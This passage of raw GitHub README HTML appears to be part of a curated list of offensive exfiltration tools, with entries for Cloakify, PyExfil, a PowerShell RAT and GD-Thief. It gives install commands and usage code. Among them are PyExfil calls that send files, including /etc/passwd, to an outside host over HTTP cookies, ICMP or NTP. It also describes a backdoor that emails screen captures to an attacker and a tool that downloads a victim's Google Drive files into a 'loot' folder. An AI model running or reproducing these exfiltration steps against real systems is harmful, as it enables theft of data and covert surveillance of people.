overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/TryCatchHCF/Cloakify\"\u003e\u003cpre\u003egit clone https://github.com/TryCatchHCF/Cloakify\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Cloakify some text\npython3 cloakify.py TEXT.txt ciphers/desserts.ciph \u0026gt; TEXT.cloaked\n\n# De-Cloakify the text\npython3 decloakify.py TEXT.cloaked ciphers/desserts.ciph\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Cloakify some text\u003c/span\u003e\npython3 cloakify.py TEXT.txt ciphers/desserts.ciph \u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e TEXT.cloaked\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e De-Cloakify the text\u003c/span\u003e\npython3 decloakify.py TEXT.cloaked ciphers/desserts.ciph\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210117067-4611a42a-2ac7-44af-8aee-2e448c05909b.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210117067-4611a42a-2ac7-44af-8aee-2e448c05909b.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210116996-8ec36a12-8eef-44e9-924a-ad179e599910.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210116996-8ec36a12-8eef-44e9-924a-ad179e599910.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/ytisf/PyExfil\"\u003ePyExfil\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-pyexfil\" class=\"anchor\" aria-label=\"Permalink: 🔙PyExfil\" href=\"#pyexfil\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\"An Alpha-Alpha stage package, not yet tested (and will appreciate any feedbacks and commits) designed to show several techniques of data exfiltration is real-world scenarios.\"\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://www.github.com/ytisf/PyExfil;cd PyExfil;pip install -r requirements.txt;pip install py2exe;pip setup.py install\"\u003e\u003cpre\u003egit clone https://www.github.com/ytisf/PyExfil\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e PyExfil\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003epip install -r requirements.txt\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003epip install py2exe\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003epip setup.py install\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e (Full Usage \u003ca href=\"https://github.com/ytisf/PyExfil/blob/master/USAGE.md\"\u003ehere\u003c/a\u003e)\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch4 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eHTTP Cookies\u003c/h4\u003e\u003ca id=\"user-content-http-cookies\" class=\"anchor\" aria-label=\"Permalink: HTTP Cookies\" href=\"#http-cookies\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"highlight highlight-source-python notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"from pyexfil.network.HTTP_Cookies.http_exfiltration import send_file, listen\n\n# For Client (exfil)\nsend_file(addr='http://www.morirt.com', file_path=FILE_TO_EXFIL)\n\n# For Server (collecting)\nlisten(local_addr='127.0.0.1', local_port=80)\"\u003e\u003cpre\u003e\u003cspan class=\"pl-k\"\u003efrom\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003epyexfil\u003c/span\u003e.\u003cspan class=\"pl-s1\"\u003enetwork\u003c/span\u003e.\u003cspan class=\"pl-v\"\u003eHTTP_Cookies\u003c/span\u003e.\u003cspan class=\"pl-s1\"\u003ehttp_exfiltration\u003c/span\u003e \u003cspan class=\"pl-k\"\u003eimport\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003esend_file\u003c/span\u003e, \u003cspan class=\"pl-s1\"\u003elisten\u003c/span\u003e\n\n\u003cspan class=\"pl-c\"\u003e# For Client (exfil)\u003c/span\u003e\n\u003cspan class=\"pl-en\"\u003esend_file\u003c/span\u003e(\u003cspan class=\"pl-s1\"\u003eaddr\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-s\"\u003e'http://www.morirt.com'\u003c/span\u003e, \u003cspan class=\"pl-s1\"\u003efile_path\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003eFILE_TO_EXFIL\u003c/span\u003e)\n\n\u003cspan class=\"pl-c\"\u003e# For Server (collecting)\u003c/span\u003e\n\u003cspan class=\"pl-en\"\u003elisten\u003c/span\u003e(\u003cspan class=\"pl-s1\"\u003elocal_addr\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-s\"\u003e'127.0.0.1'\u003c/span\u003e, \u003cspan class=\"pl-s1\"\u003elocal_port\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e80\u003c/span\u003e)\u003c/pre\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch4 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eICMP Echo 8\u003c/h4\u003e\u003ca id=\"user-content-icmp-echo-8\" class=\"anchor\" aria-label=\"Permalink: ICMP Echo 8\" href=\"#icmp-echo-8\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"highlight highlight-source-python notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"from pyexfil.network.ICMP.icmp_exfiltration import send_file, init_listener\n\n# For Client (exfil)\nip_addr = \u0026quot;127.0.0.1\u0026quot;\nsend_file(ip_addr, src_ip_addr=\u0026quot;127.0.0.1\u0026quot;, file_path=\u0026quot;\u0026quot;, max_packetsize=512, SLEEP=0.1)\n\n# For Server (collecting)\ninit_listener(ip_addr, saving_location=\u0026quot;/tmp/\u0026quot;)\"\u003e\u003cpre\u003e\u003cspan class=\"pl-k\"\u003efrom\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003epyexfil\u003c/span\u003e.\u003cspan class=\"pl-s1\"\u003enetwork\u003c/span\u003e.\u003cspan class=\"pl-c1\"\u003eICMP\u003c/span\u003e.\u003cspan class=\"pl-s1\"\u003eicmp_exfiltration\u003c/span\u003e \u003cspan class=\"pl-k\"\u003eimport\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003esend_file\u003c/span\u003e, \u003cspan class=\"pl-s1\"\u003einit_listener\u003c/span\u003e\n\n\u003cspan class=\"pl-c\"\u003e# For Client (exfil)\u003c/span\u003e\n\u003cspan class=\"pl-s1\"\u003eip_addr\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e \u003cspan class=\"pl-s\"\u003e\"127.0.0.1\"\u003c/span\u003e\n\u003cspan class=\"pl-en\"\u003esend_file\u003c/span\u003e(\u003cspan class=\"pl-s1\"\u003eip_addr\u003c/span\u003e, \u003cspan class=\"pl-s1\"\u003esrc_ip_addr\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-s\"\u003e\"127.0.0.1\"\u003c/span\u003e, \u003cspan class=\"pl-s1\"\u003efile_path\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-s\"\u003e\"\"\u003c/span\u003e, \u003cspan class=\"pl-s1\"\u003emax_packetsize\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e512\u003c/span\u003e, \u003cspan class=\"pl-c1\"\u003eSLEEP\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e0.1\u003c/span\u003e)\n\n\u003cspan class=\"pl-c\"\u003e# For Server (collecting)\u003c/span\u003e\n\u003cspan class=\"pl-en\"\u003einit_listener\u003c/span\u003e(\u003cspan class=\"pl-s1\"\u003eip_addr\u003c/span\u003e, \u003cspan class=\"pl-s1\"\u003esaving_location\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-s\"\u003e\"/tmp/\"\u003c/span\u003e)\u003c/pre\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch4 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eNTP Request\u003c/h4\u003e\u003ca id=\"user-content-ntp-request\" class=\"anchor\" aria-label=\"Permalink: NTP Request\" href=\"#ntp-request\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"highlight highlight-source-python notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"from pyexfil.network.NTP.ntp_exfil import exfiltrate, ntp_listen, NTP_UDP_PORT\n\n# For Client (exfil)\nip_addr = \u0026quot;127.0.0.1\u0026quot;\nexfiltrate(\u0026quot;/etc/passwd\u0026quot;, ip_addr, time_delay=0.1)\n\n# For Server (collecting)\nntp_listener(ip=\u0026quot;0.0.0.0\u0026quot;, port=NTP_UDP_PORT)\"\u003e\u003cpre\u003e\u003cspan class=\"pl-k\"\u003efrom\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003epyexfil\u003c/span\u003e.\u003cspan class=\"pl-s1\"\u003enetwork\u003c/span\u003e.\u003cspan class=\"pl-c1\"\u003eNTP\u003c/span\u003e.\u003cspan class=\"pl-s1\"\u003entp_exfil\u003c/span\u003e \u003cspan class=\"pl-k\"\u003eimport\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003eexfiltrate\u003c/span\u003e, \u003cspan class=\"pl-s1\"\u003entp_listen\u003c/span\u003e, \u003cspan class=\"pl-c1\"\u003eNTP_UDP_PORT\u003c/span\u003e\n\n\u003cspan class=\"pl-c\"\u003e# For Client (exfil)\u003c/span\u003e\n\u003cspan class=\"pl-s1\"\u003eip_addr\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e \u003cspan class=\"pl-s\"\u003e\"127.0.0.1\"\u003c/span\u003e\n\u003cspan class=\"pl-en\"\u003eexfiltrate\u003c/span\u003e(\u003cspan class=\"pl-s\"\u003e\"/etc/passwd\"\u003c/span\u003e, \u003cspan class=\"pl-s1\"\u003eip_addr\u003c/span\u003e, \u003cspan class=\"pl-s1\"\u003etime_delay\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e0.1\u003c/span\u003e)\n\n\u003cspan class=\"pl-c\"\u003e# For Server (collecting)\u003c/span\u003e\n\u003cspan class=\"pl-en\"\u003entp_listener\u003c/span\u003e(\u003cspan class=\"pl-s1\"\u003eip\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-s\"\u003e\"0.0.0.0\"\u003c/span\u003e, \u003cspan class=\"pl-s1\"\u003eport\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003eNTP_UDP_PORT\u003c/span\u003e)\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/206573575-e90384c4-4a39-4f3c-96ec-face1f191808.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/206573575-e90384c4-4a39-4f3c-96ec-face1f191808.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/Viralmaniar/Powershell-RAT\"\u003ePowershell RAT\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-powershell-rat\" class=\"anchor\" aria-label=\"Permalink: 🔙Powershell RAT\" href=\"#powershell-rat\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003ePython based backdoor that uses Gmail to exfiltrate data as an e-mail attachment. It tracks the user activity using screen capture and sends the information to an attacker as an e-mail attachment.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/Viralmaniar/Powershell-RAT\"\u003e\u003cpre\u003egit clone https://github.com/Viralmaniar/Powershell-RAT\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e (Full Usage \u003ca href=\"https://github.com/Viralmaniar/Powershell-RAT/blob/master/README.md\"\u003ehere\u003c/a\u003e)\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch4 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eSetup\u003c/h4\u003e\u003ca id=\"user-content-setup\" class=\"anchor\" aria-label=\"Permalink: Setup\" href=\"#setup\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eThrowaway Gmail address\u003c/li\u003e\n\u003cli\u003eEnable \"Allow less secure apps\" by going to \u003ca href=\"https://myaccount.google.com/lesssecureapps\" rel=\"nofollow\"\u003ehttps://myaccount.google.com/lesssecureapps\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eModify the \u003ccode\u003e$username\u003c/code\u003e \u0026amp; \u003ccode\u003e$password\u003c/code\u003e variables for your account in the Mail.ps1 Powershell file\u003c/li\u003e\n\u003cli\u003eModify \u003ccode\u003e$msg.From\u003c/code\u003e \u0026amp; \u003ccode\u003e$msg.To.Add\u003c/code\u003e with throwaway gmail address\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210267906-68a2e852-d7b5-4b61-a747-77844e1d7d99.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210267906-68a2e852-d7b5-4b61-a747-77844e1d7d99.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/antman1p/GD-Thief\"\u003eGD-Thief\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-gd-thief\" class=\"anchor\" aria-label=\"Permalink: 🔙GD-Thief\" href=\"#gd-thief\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eTool for exfiltrating files from a target's Google Drive that you have access to, via Google's API.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThis includes all shared files, all files from shared drives, and all files from domain drives that the target has access to.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/antman1p/GD-Thief.git\ncd GD-Thief\npip install --upgrade google-api-python-client google-auth-httplib2 google-auth-oauthlib\"\u003e\u003cpre\u003egit clone https://github.com/antman1p/GD-Thief.git\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e GD-Thief\npip install --upgrade google-api-python-client google-auth-httplib2 google-auth-oauthlib\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003ethen...\u003c/p\u003e\n\u003col dir=\"auto\"\u003e\n\u003cli\u003eCreate a new Google Cloud Platform (GCP) project\u003c/li\u003e\n\u003cli\u003eEnable a Google Workspace API\u003c/li\u003e\n\u003cli\u003eConfigure OAuth Consent screen\u003c/li\u003e\n\u003cli\u003eCreate a credential\u003c/li\u003e\n\u003cli\u003eAdd the victim's Google account to the Application's Test Users\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp dir=\"auto\"\u003eFor detailed setup instructions see the \u003ca href=\"https://github.com/antman1p/GD-Thief#how-to\"\u003eHow To Guide\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"usage:\npython3 gd_thief.py [-h] -m [{dlAll, dlDict[-d \u0026lt;DICTIONARY FILE PATH\u0026gt;]}\n\t[-t \u0026lt;THREAD COUNT\u0026gt;]\n\nhelp:\n\nThis Module will connect to Google's API using an access token and exfiltrate files\nfrom a target's Google Drive. It will output exfiltrated files to the ./loot directory\n\narguments:\n -m [{dlAll, dlDict}],\n --mode [{dlAll, dlDict}]\n The mode of file download\n Can be \u0026quot;dlAll\u0026quot;, \u0026quot;dlDict [-d \u0026lt;DICTIONARY FILE PATH\u0026gt;]\u0026quot;, or... (More options to come)\n\noptional arguments:\n -d \u0026lt;DICTIONARY FILE PATH\u0026gt;, --dict \u0026lt;DICTIONARY FILE PATH\u0026gt;\n Path to the dictionary file. Mandatory with download mode\u0026quot;-m, --mode dlDict\u0026quot;\n You can use the provided dictionary, per example: \u0026quot;-d ./dictionaries/secrets-keywords.txt\u0026quot;\n -t \u0026lt;THREAD COUNT\u0026gt;, --threads \u0026lt;THREAD COUNT\u0026gt;\n Number of threads. (Too many could exceeed Google's rate limit threshold)\n\n -h, --help\n show this help message and exit\"\u003e\u003cpre\u003eusage:\npython3 gd_thief.py [-h] -m [{dlAll, dlDict[-d \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eDICTIONARY FILE PATH\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e]}\n\t[-t \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eTHREAD COUNT\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e]\n\nhelp:\n\nThis Module will connect to Google\u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003es API using an access token and exfiltrate files\u003c/span\u003e\n\u003cspan class=\"pl-s\"\u003efrom a target\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003es Google Drive. It will output exfiltrated files to the ./loot directory\n\narguments:\n -m [{dlAll, dlDict}],\n --mode [{dlAll, dlDict}]\n The mode of file download\n Can be \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003edlAll\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e, \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003edlDict [-d \u0026lt;DICTIONARY FILE PATH\u0026gt;]\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e, or... (More options to come)\n\noptional arguments:\n \u003cspan class=\"pl-k\"\u003e-d\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eDICTIONARY FILE PATH\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e, --dict \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eDICTIONARY FILE PATH\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e\n Path to the dictionary file. Mandatory with download mode\u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e-m, --mode dlDict\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e\n You can use the provided dictionary, per example: \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e-d ./dictionaries/secrets-keywords.txt\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e\n \u003cspan class=\"pl-k\"\u003e-t\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eTHREAD COUNT\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e, --threads \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eTHREAD COUNT\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e\n Number of threads. (Too many could exceeed Google\u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003es rate limit threshold)\u003c/span\u003e\n\u003cspan class=\"pl-s\"\u003e\u003c/span\u003e\n\u003cspan class=\"pl-s\"\u003e -h, --help\u003c/span\u003e\n\u003cspan class=\"pl-s\"\u003e show this help message and 